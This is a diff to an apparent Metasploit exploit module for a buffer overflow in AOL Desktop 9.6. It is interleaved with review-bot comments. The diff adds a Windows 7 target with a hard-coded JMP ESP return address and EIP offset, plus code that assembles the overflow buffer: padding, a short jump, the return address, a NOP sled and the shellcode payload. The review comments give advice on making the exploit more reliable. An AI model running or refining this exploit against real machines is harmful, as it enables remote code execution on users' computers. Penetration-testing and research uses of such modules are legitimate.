diff --git a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb
index a1e15b8b72..163eb04c8b 100644
--- a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb
+++ b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb
@@ -29,10 +29,11 @@ class Metasploit3 < Msf::Exploit::Remote
 'Version' => "$Revision$",
 'Author' =>
 [
- 'sup3r', #Initial disclosure, poc (9.5)
- 'sickn3ss', #9.6 poc
- 'sinn3r', #Metasploit
- 'mr_me', #NX bypass target
+ 'sup3r', #Initial disclosure, poc (9.5)
+ 'sickn3ss', #9.6 poc
+ 'sinn3r', #Metasploit
+ 'mr_me', #NX bypass target
+ 'silent_dream', #Win 7 target
 ],
 'References' =>
 [
@@ -60,7 +61,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Max' => 8000, #Buffer max. Can be more.
 },
 ],
-
 [
 'AOL Desktop 9.6 on Windows XP SP3 - NX bypass',
 {
@@ -70,6 +70,14 @@ class Metasploit3 < Msf::Exploit::Remote
 'Max' => 8000, # Buffer max. Can be more.
 },
 ],
+ [
+ 'AOL Desktop 9.6 on Windows 7',
+ {
+ 'Ret' => 0x63227D6D, # JMP ESP in coolapi.dll
+ 'Offset' => 4327, # Offset to EIP
+ 'Max' => 8000, # Buffer max. Can be more
+ }
+ ],
 ],
 'Privileged' => false,
 'DisclosureDate' => "Jan 31 2011",
@@ -85,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def exploit
- if target.name !~ /SP3 - NX bypass/
+ if target.name =~ /XP SP3$/
 # Compatible with what the poc has, and what I see on my debugger
 sploit = ''
@@ -101,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
 sploit << payload.encoded
 sploit << rand_text_alpha(target['Max']-sploit.length)
- else
+ elsif target.name =~ /SP3 - NX bypass$/
 #Thanks mr_me for the ROP chain
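Review bot: The new target's `'Ret' => 0x63227D6D, # JMP ESP in coolapi.dll` pins a hard-coded address without recording which coolapi.dll build it was taken from, so the next AOL Desktop 9.6 build that ships a different DLL will silently turn this into a crash rather than a miss that someone can diagnose. Unlike the sibling "XP SP3 - NX bypass" target, this one returns straight into stack-resident shellcode, which presumably only works when DEP is not enforced for the AOL Desktop process on that Windows 7 host; that assumption belongs next to the address. I would expand the comment to `# JMP ESP in coolapi.dll (version/build: TODO record); stack shellcode, so assumes DEP is not enforced for this process` and consider reflecting the no-DEP assumption in the target name, as the XP NX-bypass target already does in reverse. The dispatch in the later hunks now keys on `$`-anchored regexes over these human-readable names, so renaming a target also has to keep those regexes in step.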
@@ -173,6 +181,18 @@ class Metasploit3 < Msf::Exploit::Remote
 #Padding
 sploit << rand_text_alpha(target['Max']-sploit.length)
+ elsif target.name =~ /Windows 7/
+
+ #Thanks silent_dream
+
+ sploit = ''
+ sploit << rand_text_alpha(target['Offset']-2)
+ sploit << "\xeb\x10"
+ sploit << [target.ret].pack('V')
+ sploit << make_nops(16)
+ sploit << payload.encoded
+ sploit << rand_text_alpha(target['Max'] - sploit.length)
+
 end
 link_value = rand_text_alpha(6)
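Review bot: With `else` replaced by a third `elsif`, every branch is now a positive regex match on `target.name`, so a target whose name matches none of them (or a renamed one) leaves `sploit` as nil and the failure only surfaces later as a NoMethodError on the builder code rather than as a clear error; add a fallthrough before the `end`, e.g. `else` / `raise RuntimeError, "Unsupported target: #{target.name}"`. The two bytes `"\xeb\x10"` placed just before `[target.ret].pack('V')` are not reached on the JMP ESP path, since ESP points past the saved return address at the NOP sled; if they are there for a different ESP alignment observed in testing, a comment such as `# jmp short +0x10 over the return address, in case ESP lands before it` should say so, otherwise they are unexplained filler. The `target['Max'] - sploit.length` padding also goes negative if the encoded payload is larger than the remaining room, which the module should reject rather than pass to rand_text_alpha. The body of `exploit` starts outside this hunk.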